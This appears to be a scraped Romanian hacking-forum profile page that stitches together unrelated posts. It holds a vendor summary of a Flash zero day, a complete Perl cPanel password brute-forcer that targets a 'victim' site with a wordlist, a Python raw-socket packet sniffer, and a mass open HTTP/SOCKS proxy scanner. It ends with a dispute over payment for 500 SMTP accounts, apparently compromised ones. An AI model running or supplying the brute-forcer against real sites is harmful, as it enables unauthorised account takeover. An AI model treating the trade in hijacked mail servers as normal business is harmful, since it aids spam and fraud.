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About jimmy1984
- Birthday 06/05/1984
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Adobe has just released a security update for Adobe Flash to address a vulnerability (CVE-2016-1019) that was used in zero day attacks against older versions of Adobe Flash. We previously discussed one such attack when we discovered this vulnerability being integrated in Magnitude Exploit Kit. In this post, we took a look at the exploit code. In the sample we acquired from our Smart Protection Network feedback, we observed that this vulnerability is also present in Mac OS X. In addition to being present on the Windows platform, it is interesting to note it is also present on Mac OS X given that fewer exploits target the said OS. Articolul complet aici: http://blog.trendmicro.com/trendlabs-security-intelligence/look-adobe-flash-player-cve-2016-1019-zero-day-vulnerability/
#!/usr/bin/perl # Cpanel Brute Forcer # ---------------------------- # Criado By Mitiny-x use IO::Socket; use LWP::Simple; use MIME::Base64; $host = $ARGV[]; $user = $ARGV[1]; $port = $ARGV[2]; $list = $ARGV[3]; $file = $ARGV[4]; $url = "http://".$host.":".$port; if(@ARGV < 3){ print q( ############################################################### # Cpanel Brute Force # ############################################################### # usage : cpanel.pl [HOST] [User] [PORT] [list] [File] # #-------------------------------------------------------------# # [Host] : Site Da Vitima (www.site.com) # # [User] : User Admin (Admin) # # [PORT] : Port Do Cpanel (8090) # # [list] : Word List De Senhas (list.txt) # # [File] : Local Onde Salva Senha (password.txt) # # # ############################################################### # Criado By Mitiny # ############################################################### );exit;} headx(); $numstart = "-1"; sub headx() { print q( ############################################################### # Cpanel Brute Force PassWord # # Criado By Mitiny21 # ############################################################### ); open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !"; @PASSWORDS = <PASSFILE>; close PASSFILE; foreach my $P (@PASSWORDS) { chomp $P; $passwd = $P; print "\n [~] Try Password : $passwd \n"; &brut; }; } sub brut() { $authx = encode_base64($user.":".$passwd); print $authx; my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "\n [-] Can not connect to the host"; print $sock "GET / HTTP/1.1\n"; print $sock "Authorization: Basic $authx\n"; print $sock "Connection: Close\n\n"; read $sock, $answer, 128; close($sock); if ($answer =~ /Moved/) { print "\n [~] PASSWORD FOUND : $passwd \n"; exit(); } }
Unde e scam?Aduci dovezi sau taci.
L.E.:Tool-ul nu imi apartine.
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Ah...Apoi scuze.
import struct import sys,os import socket import binascii rawSocket=socket.socket(socket.PF_PACKET,socket.SOCK_RAW,socket.htons(0x0800)) #ifconfig eth0 promisc up receivedPacket=rawSocket.recv(2048) #Ethernet Header... ethernetHeader=receivedPacket[0:14] ethrheader=struct.unpack("!6s6s2s",ethernetHeader) destinationIP= binascii.hexlify(ethrheader[0]) sourceIP= binascii.hexlify(ethrheader[1]) protocol= binascii.hexlify(ethrheader[2]) print "Destination: " + destinationIP print "Source: " + sourceIP print "Protocol: "+ protocol #IP Header... ipHeader=receivedPacket[14:34] ipHdr=struct.unpack("!12s4s4s",ipHeader) destinationIP=socket.inet_ntoa(ipHdr[2]) sourceIP=socket.inet_ntoa(ipHdr[1]) print "Source IP: " +sourceIP print "Destination IP: "+destinationIP #TCP Header... tcpHeader=receivedPacket[34:54] tcpHdr=struct.unpack("!2s2s16s",tcpHeader) sourcePort=socket.inet_ntoa(tcpHdr[0]) destinationPort=socket.inet_ntoa(tcpHdr[1]) print "Source Port: " + sourcePort print "Destination Port: " + destinationPort
import urllib2 from random import random import sys import pycurl import socket import threading import getopt import cStringIO static_tests = ['google.com','youtube.com'] http_types = ["http","https"] socks_ports = set([1080, 1081, 8080, 8081, 27352, 31035, 6675, 6666, 16621, 43687]) socks_types = [pycurl.PROXYTYPE_SOCKS4, pycurl.PROXYTYPE_SOCKS5] http_timeout = 0.1 socks_timeout = 1 class HttpScanner(threading.Thread): def __init__(self,ips): super(HttpScanner, self).__init__() self.good_ips = ips self.res = [] def testHttpProxySupport(self,url): for scheme in http_types: proxy_support = urllib2.ProxyHandler({scheme : url} ) opener = urllib2.build_opener(proxy_support) urllib2.install_opener(opener) for test in static_tests: try: urllib2.urlopen("{0}://{1}".format(scheme,test),timeout = http_timeout) self.res.append("{0}://{1}".format(scheme,url)) break except Exception: pass def run(self): for ip in self.good_ips: self.testHttpProxySupport(ip) class SocksScanner(threading.Thread): def __init__(self,ips,sock): super(SocksScanner, self).__init__() self.good_ips = ips self.res = [] self.socksc = pycurl.Curl() self.socksc.setopt(pycurl.CONNECTTIMEOUT, socks_timeout) self.socksc.setopt(pycurl.TIMEOUT, socks_timeout) self.socksc.setopt(pycurl.NOSIGNAL, socks_timeout) self.sock = sock self.buf = cStringIO.StringIO() self.socksc.setopt(self.socksc.WRITEFUNCTION,self.buf.write) def testSocksProxySupport(self,url): type = socks_types[0] # SOCKS4 self.socksc.setopt(pycurl.PROXY, url) for scheme in socks_types: for test in static_tests: self.socksc.setopt(pycurl.URL, "http://"+test) self.socksc.setopt(pycurl.PROXYPORT, self.sock) self.socksc.setopt(pycurl.PROXYTYPE, scheme) try: self.socksc.perform() s_scheme = "SOCKS4" if scheme == pycurl.PROXYTYPE_SOCKS4 else "SOCKS5" self.res.append("{0}:{1}:{2}".format(s_scheme,url,self.sock)) break except Exception: pass def run(self): for ip in self.good_ips: self.testSocksProxySupport(ip) self.buf.truncate(0) def genRange(start,end): low_sects = [] high_sects = [] try: low_sects = [ int(x) for x in start.split('.') ] high_sects = [ int(x) for x in end.split('.') ] l_len = len(low_sects) if(l_len != 4 or l_len != len(high_sects)): raise Exception('yikes') except Exception: print "That doesn't look like a valid IP" return None if(low_sects[0] != high_sects[0]): print "You've selected to generate a lot of IPs, this might take a while" if(low_sects[0] > high_sects[0] or low_sects[1] > high_sects[1] or low_sects[2] > high_sects[2] or low_sects[3] > high_sects[3]): print "All of the sections of the lower range must be lower than the upper range" return None if(high_sects[0] > 254 or high_sects[1] > 254 or high_sects[2] > 254 or high_sects[3] > 254): print "One of your upper ranges is beyond the limit of IPv4" return None return [ str(la)+"."+str(lb)+"."+str(lc)+"."+str(ld) for la in range(low_sects[0],high_sects[0]+1) for lb in range(low_sects[1],high_sects[1]+1) for lc in range(low_sects[2],high_sects[2]+1) for ld in range(low_sects[3],high_sects[3]+1) ] def parseFile(fileIn, socks_ports): ips = [] try: f = file(fileIn,'r') for p in f: try: (ip,port) = p.split(":") socks_ports.add(int(port)) ips.append(ip) except Exception as e: pass except Exception as e: pass return ips def usage(): print "socks-scanner.py help\n" print "Options:\n" print "-h, --help: print this help" print "-f, --file: input from file" print "-o, --output: output to file; if no output is specified it will output to stdout" print "-b, --blocks: number of blocks into which to split the IPs; the default is 1" print "-s, --start: starting IP" print "-e, --end: ending IP, if none is specified it will just try one IP" print "-p,--timeout-http: Timeout for HTTP(S) socket connections; default is 0.1 seconds (100ms); minimum is 0.1 seconds" print "-c,--timeout-socks: Timeout for SOCKS4/5 connections; default is 1 second; minimum is 1 second\n" print "File Input Syntax:\n" print "remotehost:port\n" print "Examples:\n" print "python socks-scanner.py -f <FILE_IN> -o <FILE_OUT>" print "python socks-scanner.py -s <LOWER_RANGE> -e <UPPER_RANGE> -b <BLOCKS>" print "python socks-scanner.py -s <IP>" def main(): try: opts, args = getopt.getopt(sys.argv[1:], "h:f:o:b:s:e:p:c",["help","file=","output=","blocks=","start=","end=","timeout-http=","timeout-socks="]) except getopt.GetoptError as err: # print help information and exit: print str(err) # will print something like "option -a not recognized" usage() sys.exit(2) fileIn = None fileOut = None fromFile = False toFile = False numThreads = 1 startIP = None endIP = None socks_ports = set([1080, 1081, 8080, 8081, 27352, 31035, 6675, 6666, 6667, 16621, 43687, 13874]) for o, a in opts: if o in ("-f", "--file"): fromFile = True fileIn = a socks_ports = set([]) elif o in ("-h", "--help"): usage() sys.exit() elif o in ("-o", "--output"): toFile = True fileOut = a elif o in ("-b", "--blocks"): try: numThreads = int(a) if(numThreads < 1): raise Exception('yikes') except Exception: print "Not a valid number of threads, using 1 instead" elif o in ("-s", "--start"): startIP = a elif o in ("-e", "--end"): endIP = a elif o in ("-p", "--timeout-http"): http_timeout = a elif o in ("-c", "--timeout-socks"): socks_timeout = a else: usage() sys.exit() http_res = [] socks_res = [] good_ips = None ip_len = 0 if(fromFile): good_ips = parseFile(fileIn,socks_ports) ip_len = len(good_ips) print "Finished parsing", ip_len,"IPs, beginning scan" pass elif(startIP and endIP): good_ips = genRange(startIP,endIP) ip_len = len(good_ips) print "Finished generating", ip_len,"IPs, beginning scan" elif(startIP): good_ips = [startIP] ip_len = 1 else: usage() sys.exit() if(ip_len < 1): usage() sys.exit() bucket_size = ip_len / numThreads http_job_list = [] socks_job_list = [] for i in range(numThreads-1): ip_section = good_ips[i*bucket_size:(i+1)*bucket_size] http_job_list.append(HttpScanner(ip_section)) for port in socks_ports: socks_job_list.append(SocksScanner(ip_section,port)) last_section = good_ips[bucket_size*(numThreads-1):] http_job_list.append(HttpScanner(last_section)) for port in socks_ports: socks_job_list.append(SocksScanner(last_section,port)) for j in http_job_list: j.start() for j in socks_job_list: j.start() for j in http_job_list: j.join() http_res += j.res for j in socks_job_list: j.join() socks_res += j.res if(toFile): try: output = file(fileOut,'w') if(http_res): output.write("HTTP(S) Proxies:\n") for p in http_res: output.write(p+"\n") if(socks_res): output.write("SOCKS Proxies:\n") for p in socks_res: output.write(p+"\n") except Exception as e: print "An error occurred:",str(e) else: print "HTTP(S) Proxies:" for p in http_res: print p print "SOCKS Proxies:" for p in socks_res: print p main()
Please dont make bussines with it,he is a scammer. I give him 500 smtp,6$ per piece,500 smtps*5$=2500$,i didnt receive anything.